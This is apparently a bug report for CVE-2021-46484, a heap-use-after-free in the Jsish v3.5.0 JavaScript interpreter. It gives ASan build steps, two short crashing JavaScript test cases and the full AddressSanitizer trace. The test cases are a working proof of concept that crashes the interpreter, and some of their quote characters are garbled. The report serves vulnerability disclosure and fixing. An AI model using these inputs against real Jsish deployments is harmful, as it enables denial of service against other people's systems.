Headline
CVE-2021-46484: Heap-use-after-free src/jsiValue.c:34 in Jsi_IncrRefCount · Issue #73 · pcmacdon/jsish
Jsish v3.5.0 was discovered to contain a heap-use-after-free via Jsi_IncrRefCount in src/jsiValue.c. This vulnerability can lead to a Denial of Service (DoS).
Jsish revision
Commit: 9fa798e
Version: v3.5.0
Build platform
Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)
Build steps
export CFLAGS=’-fsanitize=address’ make
Test case1
function JSEtest(assert) { (arr.concat([]), false, ‘JSEtest’); }
var arr = /x?y?z?/.exec(“abcd”); arr[arr[arr[‘JSEtest’[arr[1000] = 3]] = 3] = 3](arr.every(JSEtest), false, ‘JSEtest’);
Test case2
var list = [ 'aa’, 'bb’, 'cc’, 'dd’, 'hhh’, 'mm’, ‘nn’ ]; ‘sort:’ + list.sort(function (_str, position) { var s = ‘sort:’ + list.sort(function (str, position) { var s = ‘shift:’ + list.shift(); }) + list.shift(); });
Execution steps & Output
$ ./jsish/jsish poc.js
==114358==ERROR: AddressSanitizer: heap-use-after-free on address 0x603000007060 at pc 0x556541bb6a68 bp 0x7ffd4e8abbc0 sp 0x7ffd4e8abbb0 READ of size 4 at 0x603000007060 thread T0 #0 0x556541bb6a67 in Jsi_IncrRefCount src/jsiValue.c:34 #1 0x556541d0aab5 in Jsi_ObjNewArray src/jsiObj.c:480 #2 0x556541c75f14 in jsi_ArrayFindSubCmd src/jsiArray.c:573 #3 0x556541c75f14 in jsi_ArrayEveryCmd src/jsiArray.c:663 #4 0x556541c31818 in jsi_FuncCallSub src/jsiProto.c:244 #5 0x556541efb71a in jsiFunctionSubCall src/jsiEval.c:796 #6 0x556541efb71a in jsiEvalFunction src/jsiEval.c:837 #7 0x556541efb71a in jsiEvalCodeSub src/jsiEval.c:1264
#8 0x556541f0f15e in jsi\_evalcode src/jsiEval.c:2204
#9 0x556541f13274 in jsi\_evalStrFile src/jsiEval.c:2665
#10 0x556541c0266a in Jsi\_Main src/jsiInterp.c:936
#11 0x55654240703a in jsi\_main src/main.c:47
#12 0x7f7e9588dbf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
#13 0x556541b96969 in \_start (/usr/local/bin/jsish+0xe8969)
0x603000007060 is located 0 bytes inside of 32-byte region [0x603000007060,0x603000007080) freed by thread T0 here: #0 0x7f7e964fc7a8 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xde7a8) #1 0x556541bb76cf in Jsi_DecrRefCount src/jsiValue.c:52
previously allocated by thread T0 here: #0 0x7f7e964fcd28 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded28) #1 0x556541c07aa4 in Jsi_Calloc src/jsiUtils.c:57
SUMMARY: AddressSanitizer: heap-use-after-free src/jsiValue.c:34 in Jsi_IncrRefCount Shadow bytes around the buggy address: 0x0c067fff8db0: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd 0x0c067fff8dc0: fd fd fa fa 00 00 04 fa fa fa 00 00 04 fa fa fa 0x0c067fff8dd0: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 0x0c067fff8de0: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 0x0c067fff8df0: 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa =>0x0c067fff8e00: fd fd fd fd fa fa 00 00 00 00 fa fa[fd]fd fd fd 0x0c067fff8e10: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 0x0c067fff8e20: 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 0x0c067fff8e30: 00 00 00 00 fa fa 00 00 00 00 fa fa fa fa fa fa 0x0c067fff8e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8e50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb